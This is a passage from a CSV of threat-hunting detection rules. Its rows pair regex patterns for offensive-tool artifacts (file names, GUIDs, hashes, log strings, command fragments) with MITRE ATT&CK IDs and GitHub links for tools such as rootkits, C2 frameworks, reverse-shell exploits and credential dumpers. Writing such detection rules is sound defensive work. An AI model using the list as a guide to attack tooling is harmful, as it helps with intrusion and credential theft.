- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*",".{0,1000}acf7a8a9\-3aaf\-46c2\-8aa8\-2d12d7681baf.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*acheron-master.zip*",".{0,1000}acheron\-master\.zip.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ACLight.ps1*",".{0,1000}ACLight\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight.psd1*",".{0,1000}ACLight\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight.psm1*",".{0,1000}ACLight\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight2.ps1*",".{0,1000}ACLight2\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" 
"*ACLight2.psd1*",".{0,1000}ACLight2\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight2.psm1*",".{0,1000}ACLight2\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*ACLight-master*",".{0,1000}ACLight\-master.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*aclpwn -f * -ft computer -t * -tt domain -d * -dry*",".{0,1000}aclpwn\s\-f\s.{0,1000}\s\-ft\scomputer\s\-t\s.{0,1000}\s\-tt\sdomain\s\-d\s.{0,1000}\s\-dry.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*aclpwn.py*",".{0,1000}aclpwn\.py.{0,1000}","offensive_tool_keyword","Aclpwn","Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. 
It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn","T1098 - T1208 - T1550 - T1484 - T1486","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/aclpwn.py","1","0","N/A","N/A","7","673","106","2021-11-18T03:47:24Z","2018-12-04T18:45:04Z" "*ACLScanner.exe*",".{0,1000}ACLScanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*acltoolkit *",".{0,1000}acltoolkit\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit.git*",".{0,1000}acltoolkit\.git.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-ad*",".{0,1000}acltoolkit\-ad.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-main*",".{0,1000}acltoolkit\-main.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acronis_trueimage_xpc_privesc*",".{0,1000}acronis_trueimage_xpc_privesc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*AcroRd32.exe FUZZ*",".{0,1000}AcroRd32\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*Action: Locating SCCM Management Servers*",".{0,1000}Action\:\sLocating\sSCCM\sManagement\sServers.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*Action: Locating SCCM Servers in Registry*",".{0,1000}Action\:\sLocating\sSCCM\sServers\sin\sRegistry.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*action=SchTaskCOMHijack *",".{0,1000}action\=SchTaskCOMHijack\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*Activate all of rootkit's hooks*",".{0,1000}Activate\sall\sof\srootkit\'s\shooks.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*activate_command_control_shell(*",".{0,1000}activate_command_control_shell\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*activate_command_control_shell_encrypted(*",".{0,1000}activate_command_control_shell_encrypted\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Activated COMMAND & CONTROL encrypted shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sencrypted\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution 
hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Activated COMMAND & CONTROL shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Activating COMMAND & CONTROL with MULTI-PACKET backdoor trigger*",".{0,1000}Activating\sCOMMAND\s\&\sCONTROL\swith\sMULTI\-PACKET\sbackdoor\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*activedirectory/pwns.go*",".{0,1000}activedirectory\/pwns\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*ActiveMQ-RCE -i *",".{0,1000}ActiveMQ\-RCE\s\-i\s.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit 
for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*ActiveMQ-RCE.exe*",".{0,1000}ActiveMQ\-RCE\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*activeScan++.py*",".{0,1000}activeScan\+\+\.py.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","574","182","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*AD LDAP Command Line Searching that doesn't suck.*",".{0,1000}AD\sLDAP\sCommand\sLine\sSearching\sthat\sdoesn\'t\ssuck\..{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*AD Privesc Automation*",".{0,1000}AD\sPrivesc\sAutomation.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*ad_dns_dump.txt*",".{0,1000}ad_dns_dump\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*AD_Enumeration_Hunt.ps1*",".{0,1000}AD_Enumeration_Hunt\.ps1.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","AD Enumeration","7","1","92","19","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*AD_Enumeration_Hunt-alperen_ugurlu_hack*",".{0,1000}AD_Enumeration_Hunt\-alperen_ugurlu_hack.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","AD Enumeration","7","1","92","19","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*ad_miner.sources.modules.*",".{0,1000}ad_miner\.sources\.modules\..{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - 
T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*AD_Miner-main*",".{0,1000}AD_Miner\-main.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*AD0067D9-4AF6-47C2-B0C3-D768A9624002*",".{0,1000}AD0067D9\-4AF6\-47C2\-B0C3\-D768A9624002.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766*",".{0,1000}ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798*",".{0,1000}ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347*",".{0,1000}ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd*",".{0,1000}ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*AD495F95-007A-4DC1-9481-0689CA0547D9*",".{0,1000}AD495F95\-007A\-4DC1\-9481\-0689CA0547D9.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" 
"*ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546*",".{0,1000}ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07*",".{0,1000}ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*ADACLScan.ps1*",".{0,1000}ADACLScan\.ps1.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*ADACLScanner*",".{0,1000}ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" 
"*ADACLScanner-master*",".{0,1000}ADACLScanner\-master.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*adalanche analyze*",".{0,1000}adalanche\sanalyze.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*adalanche collect*",".{0,1000}adalanche\scollect.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*adalanche-*.exe*",".{0,1000}adalanche\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*Adalanche.git*",".{0,1000}Adalanche\.git.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" 
"*adalanche-collector*",".{0,1000}adalanche\-collector.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*Adamantium-Thief-master*",".{0,1000}Adamantium\-Thief\-master.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*ADCEEFBA-CE43-4239-8AE8-7D8D43E66BB1*",".{0,1000}ADCEEFBA\-CE43\-4239\-8AE8\-7D8D43E66BB1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*ADCollector.exe*",".{0,1000}ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADCollector3.csproj*",".{0,1000}ADCollector3\.csproj.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*adconnectdump.py*",".{0,1000}adconnectdump\.py.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*adconnectdump-master*",".{0,1000}adconnectdump\-master.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - 